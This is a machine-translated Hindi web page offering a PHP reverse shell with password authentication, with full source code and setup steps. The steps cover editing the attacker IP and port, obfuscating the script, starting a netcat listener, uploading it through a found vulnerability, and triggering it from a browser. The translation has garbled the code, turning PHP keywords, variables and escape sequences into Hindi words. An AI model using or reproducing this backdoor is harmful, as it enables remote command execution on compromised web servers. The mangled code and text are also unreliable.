शेल v1.0 PHP रिवर्स – प्रमाणीकरण सुविधा
द्वारा उत्पाद:
अशफाक अंसारी
संस्करण:
1.0
कीमत:
मुक्त

द्वारा समीक्षित:
रेटिंग:
5
पर अक्टूबर 9, 2012
अंतिम संशोधित:जनवरी 18, 2013

सारांश:

इनबिल्ट प्रमाणीकरण सुविधा के साथ PHP शैल कनेक्ट रिवर्स. अपने पिछले दरवाजे की रक्षा के लिए बहुत बढ़िया स्क्रिप्ट.

परिचय

 

यह उपकरण आपको अपलोड PHP चल रहा है जो एक वेब सर्वर तक पहुँच गए हैं जहाँ pentest स्थिति के लिए तैयार है.
वेब जड़ में कहीं न कहीं इस स्क्रिप्ट अपलोड करें तो अपने ब्राउज़र में उचित यूआरएल तक पहुँचने के द्वारा इसे चलाने. स्क्रिप्ट स्क्रिप्ट में परिभाषित एक मेजबान और बंदरगाह के लिए वेब सर्वर से एक आउटबाउंड टीसीपी कनेक्शन खुलेगा. इस TCP कनेक्शन के लिए बाध्य एक खोल होगा.
 

यह आप की तरह interective प्रोग्राम चला सकते हैं जिसमें एक उचित इंटरैक्टिव खोल होगा टेलनेट और एसएसएच.
इस खोल आपके पिछले दरवाजे कोस से किसी और को रोकता है जो एक inbuilt प्रमाणीकरण सुविधा है.
यह आपको एक आदेश भेजने के लिए अनुमति देते हैं जो वेब प्रपत्र के आधार पर खोल से अलग है, तो तुम उत्पादन वापसी.
 

स्रोत संशोधित

 

1
2
3
$आईपी = "127.0.0.1"; #अपने सार्वजनिक आईपी इस बदलें
$बंदरगाह = 4444;      #अपने पोर्ट इस बदलें
$पासवर्ड = base64_decode("aGFja3N5c3RlYW0="); #डिफ़ॉल्ट पासवर्ड: hacksysteam (एमडी 5)

 

अपनी जरूरत और स्थिति के अनुसार मूल्यों बदलें.
 

स्रोत अंधेरा

 

एक बार जब आप संशोधन किया है, आप किसी भी ऑनलाइन उपयोग कर सकते हैं PHP ऑब्फ़्यूकेटर PHP स्क्रिप्ट सांकेतिक शब्दों में बदलना.
 

उदाहरण: http://www.codeeclipse.com/
 

Obfuscating पहले, अपनी जरूरतों के हिसाब से ऊपर मूल्यों को बदलने कृपया.
 

सेटअप netcat श्रोता

 

वेब सर्वर द्वारा सुलभ हो जाएगा कि एक मेजबान और बंदरगाह पर एक netcat श्रोता प्रारंभ.
आप उदाहरण के लिए रिवर्स खोल स्क्रिप्ट में निर्दिष्ट के रूप में यहाँ एक ही बंदरगाह का उपयोग करें (4444):
 

1
जड़ @ बीटी:~ # नेकां -lvvp 4444

 

स्क्रिप्ट अपलोड करें और यह निष्पादित

 

असुरक्षा का प्रयोग वेबसाइट में आप द्वारा की खोज, अपलोड reverse_shell.php.
कृपया अपने वेब ब्राउजर में नए अपलोड फ़ाइल पर ब्राउज़ कर बस स्क्रिप्ट चलाएँ.
 

1
एचटीटीपी://<शिकार आईपी>/<पथ अपलोड>/reverse_shell.php

 

नोट: आप वेब पेज पर कोई उत्पादन नहीं देखेंगे, यह मोड प्रतीक्षा में जारी अपनी सफल अगर.
 

अपने खोल से लूट

 

स्रोत कोड

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Reverse Shell v1.0 #
#             Authentication Feature #
#                                                 #
#            Hacksys टीम - Panthera #
#             लेखक: अशफाक अंसारी #
#            hacksysteam@hotmail.com #
#          एचटीटीपी://hacksys.vfreaks.com #
#              Designed for Linux #
#             Thanks to lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$संस्करण = "1.0";
$आईपी = "127.0.0.1"; #इस बदलें
$बंदरगाह = 4444;      #इस बदलें
$पासवर्ड = base64_decode(&quot;aGFja3N5c3RlYW0="); #डिफ़ॉल्ट पासवर्ड: hacksysteam (एमडी 5)

$बैनर = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __/ |                                
|__ __|                      |___ /
   | | ___ __ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    लेखक: अशफाक अंसारी
   hacksysteam@hotmail.com
 एचटीटीपी://hacksys.vfreaks.com /\पता\पता"
);

$लोक निर्माण विभाग = shell_exec("pwd");
$SysInfo = shell_exec("uname -a");
$पहचान = shell_exec('आईडी | cut -d "(" -च 2 | cut -d ")" -एफ 1 ');
$तारीख = shell_exec("date");
$केवल = 1337;
$जानकारी =
("
सिस्टम जानकारी:\पता$SysInfo
वर्तमान कार्य निर्देशिका: $लोक निर्माण विभाग
उपयोगकर्ता समूह: $पहचान
वर्तमान दिनांक और समय: $तारीख\पता
"
);

प्रिंट "\पतासे कनेक्ट करने की कोशिश कर रहा है: $आईपी बंदरगाह पर $बंदरगाह ...\पता\पता";

$sockfd = fsockopen($आईपी , $बंदरगाह , $errno, $errstr );

अगर($errno != 0)
  {
    प्रिंट "\पता****** त्रुटि हो गई ******\पतात्रुटि Nnumber: $errno\पतात्रुटि स्ट्रिंग: $errstr\पता\पता";
    die(0);
  }
अन्य अगर (!$sockfd)
  {
    प्रिंट "घातक : कनेक्ट करने का प्रयास करते समय एक अप्रत्याशित त्रुटि हो गया था!\पता";
  }
अन्य
  {
    प्रिंट "से जुड़ा: $आईपी बंदरगाह पर $बंदरगाह ...\पता\पता";
    fputs ($sockfd , $बैनर);
    fputs($sockfd ,"पासवर्ड दर्ज: ");
    $getpass = ट्रिम(fgets($sockfd, strlen($पासवर्ड) + 2));

    अगर ($getpass == $पासवर्ड)
    {
      fputs($sockfd, "\पताप्रमाणीकरण सफल..\पता");
      fputs($sockfd, $जानकारी);
      जब(!EOF($sockfd))
      {
    $cmdPrompt = ट्रिम($पहचान) . "@" . ट्रिम($आईपी) . ":~" . ट्रिम($लोक निर्माण विभाग) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $आदेश = ट्रिम(fgets($sockfd, $केवल));
        अगर (ट्रिम($आदेश) == "बाहर निकलें")
    {
      fputs($sockfd ,"\पताउपयोगकर्ता द्वारा निरस्त ... बाहर निकल रहा है ..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\पता" . shell_exec($आदेश) . "\पता");
      }
      fclose($sockfd);
      die(0);
    }
    अन्य
    {
      fputs($sockfd ,"\पतापासवर्ड अमान्य ... छोड़ने ...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 

स्क्रीनशॉट

 


 

रिवर्स शेल v1.0 PHP डाउनलोड – प्रमाणीकरण सुविधा

 

Reverse_Shell_v1.0.zip

 
 
 

21,001 कुल देखा गया, 9 विचारों आज

निम्नलिखित दो टैब नीचे सामग्री को बदलने.

अशफाक अंसारी

सुरक्षा शोधक
अशफाक अंसारी के संस्थापक है HackSys टीम कोड नाम "पेंथेरा". उन्होंने कहा कि सूचना सुरक्षा के विभिन्न पहलुओं में अनुभव के साथ एक सुरक्षा शोधकर्ता है. उन्होंने लिखा है, "HackSys चरम कमजोर चालक" और "मौत की shellcode". उन्होंने यह भी लिखा है और निम्न स्तर के सॉफ्टवेयर शोषण पर विभिन्न whitepapers प्रकाशित किया है. उनकी कोर हित में निहित है "निम्न स्तर शोषण", "रिवर्स इंजीनियरिंग", "कार्यक्रम के विश्लेषण" और "हाइब्रिड Fuzzing". उन्होंने कहा कि आर्टिफिशियल इंटेलिजेंस और मशीन लर्निंग के एक fanboy है. उन्होंने कहा कि के लिए अध्याय का नेतृत्व है अशक्त पुणे.

एक उत्तर दें छोड़ दो

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक क्षेत्रः चिह्नित कर रहे हैं *